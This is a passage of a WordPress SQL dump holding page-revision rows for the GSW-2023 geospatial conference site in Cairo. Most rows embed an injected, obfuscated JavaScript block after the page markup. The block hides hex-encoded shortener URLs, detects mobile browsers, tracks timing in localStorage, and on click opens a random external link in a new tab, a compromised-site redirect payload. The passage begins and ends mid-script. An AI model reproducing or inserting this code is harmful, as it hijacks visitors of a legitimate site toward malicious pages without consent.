g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:54:46','2022-11-08 22:54:46','',3066,'https://gsw2023.com/?p=3107',0,'revision','',0),
(3108,1,'2022-11-08 23:04:59','2022-11-08 23:04:59','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 23:04:59','2022-11-08 23:04:59','',3066,'https://gsw2023.com/?p=3108',0,'revision','',0),
(3109,1,'2022-11-08 23:06:32','2022-11-08 23:06:32','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948786016{margin-top: 20px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 